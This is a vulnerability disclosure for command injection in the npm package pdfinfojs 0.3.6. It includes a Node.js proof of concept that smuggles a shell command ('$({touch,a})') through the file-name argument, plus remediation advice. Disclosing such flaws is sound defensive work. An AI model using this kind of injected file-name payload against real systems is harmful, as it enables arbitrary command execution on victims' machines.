Hello, there is a Command Injection vulnerability in the "pdfinfojs" module.
module name: pdfinfojs
version: 0.3.6
npm page: https://www.npmjs.com/package/pdfinfojs
> pdfinfo shell wrapper for Node.js
10 downloads in the last day
61 downloads in the last week
106 downloads in the last month
> The module appends the filename parameter to the command string on lines 28, 47 and 72 without escaping or validating the user input, so a file name containing shell metacharacters leads to Command Injection.
$ npm install pdfinfojs

index.js, with the payload $({touch,a}) as the file name:

var pdfinfo = require('pdfinfojs'),
    pdf = new pdfinfo('$({touch,a})'); // Malicious payload
pdf.getInfo(function(err, info, params) {
    if (err) {
        console.error(err.stack);
    }
    else {
        console.log(info); // info is an object
        console.log(params); // commandline params passed to pdfinfo cmd
    }
});
There are a lot of possible payloads to achieve this; I used this brace expansion just because a space in the file name sucks.
$ node index.js
Error
... it throws an error, but the execution is successful
$ ls
a index.js
It is advisable to use a module that explicitly isolates the parameters passed to the pdfinfo command, i.e. one that invokes pdfinfo through child_process.execFile or spawn with an argument array instead of building a shell command string for exec. The shell then never sees the file name, so metacharacters in it cannot be interpreted; note that this stops shell injection but not option injection, so a file name starting with "-" should still be rejected or resolved to an absolute path.
( contacted the maintainer || opened issue ) = False
An attacker who controls the file name passed to pdfinfojs can execute arbitrary commands on the victim's machine with the privileges of the Node.js process.